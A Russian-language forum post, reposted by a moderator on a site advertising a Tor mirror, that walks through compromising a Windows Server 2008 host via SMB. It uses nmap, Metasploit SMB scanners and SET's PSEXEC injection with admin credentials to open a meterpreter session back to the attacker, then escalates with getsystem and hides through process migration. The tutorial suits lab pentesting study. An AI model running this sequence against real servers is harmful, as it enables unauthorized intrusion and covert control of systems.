Pentest Windows Server 2008

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

APSYHEA

Модератор
Команда форума

APSYHEA

Модератор
Команда форума
15 Янв 2017
168
55
Материал взят с другого источника.

В этой статье я опишу процедуру тестирования на проникновение целевого хоста под управлением Windows Server 2008.
889cba26b67362e8562c25b0af5b547a.png
Целью будет получение активной сессии meterpreter, на компьютере тестирующего.

В качестве платформы для проведения теста, мною будет использоваться Kali Linux 2016.2.

Итак, для начала немного информации, атака будет производиться используя уязвимости версии протокола SMB 2.2
SMB (Server Message Block) — сетевой протокол прикладного уровня для удалённого доступа к файлам, принтерам и другим сетевым ресурсам, а также для межпроцессорного взаимодействия.
Подвергаться эксплуатации в нашем случае будет 445 порт.

445/TCP,UDP MICROSOFT-DS — используется в Microsoft Windows 2000 и поздних версий, для прямого TCP/IP-доступа без использования NetBIOS.


Узнаем адрес сервера в сети и начнем со сканирования:

> nmap –sV –A 192.168.31.133
29b382744278ecd58f718b6c6a21db26.png
Первый положительный момент выделен, на сервере открыт интересующий нас порт.
06a69649ade389c49455bc25968be258.png

Второй момент, это наличие включенного сервиса smbv2. Теперь необходимо узнать больше о версии протокола SMB.

Запустим Metasploit Framework и выполним последовательно следующее:

> use auxiliary/scanner/smb/smb_version

> msf exploit (smb_version)>set rhosts 192.168.31.ХХХ

> msf exploit (smb_version)>exploit

ea07b889b2108f0401d051be412465c3.png
Затем выполним:

> use auxiliary/scanner/smb/smb2

> msf exploit (smb2)>set rhosts 192.168.0.XXX

> msf exploit (smb2)>set rport 445

> msf exploit (smb2)>exploit
8ab02d9313f4240a14cb8df5fa53d018.png

Версия протокола и его наличие нам стали известны. Теперь можно переходить непосредственно к проникновению.

Запускаем SET - Social Engineering Toolkit.

> setoolkit
ed576b4ddb9fe62dbd28fa84d4bca414.png

Выбираем второй пункт (2):
9c7bf071d35ab52f10377559bfca63b4.png
Будем использовать PSEXEC Injection, выбираем (6):
f5a05f26fc23e05a42d1c392cd663882.png
Вводим данные согласно требованиям SET:

> 192.168.31.133 (Адрес целевого хоста)

> Administrator (Логин целевого хоста)

> Adminroot123 (Пароль целевого хоста)

> Следующий пункт пропускаем, жмем Enter

> Следующий пункт пропускаем, жмем Enter

> 192.168.31.201 (Адрес атакующей машины)

> 445 (SMB порт)

fddf27003963c8666c1e25434d468adc.png

Если все прошло успешно, то в течение нескольких секунд запустится Metasploit, а затем откроется сессия meterpreter для доступа на целевой хост.
d228cea683e2fb58c52c82e063b5eb31.png
Проверяем работоспособность эксплойта и получаем системные привилегии:


> sessions –I 1

> sysinfo

> getsystem

046cd4c65a32f0ceaa4cd027d0c10166.png
Посмотрим список запущенных процессов:

> ps

bc93d538d8e55b69792502bf6a6a80af.png
Сам сервер, во время манипуляций ведет себя тихо, разве, что в tasklist появятся новые процессы, но с помощью миграции все поправимо:
4bfd453b4302a480c52bf77080a3e269.png
Дальше действуем на свое усмотрение. В целом, на этом все. Спасибо за внимание.
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя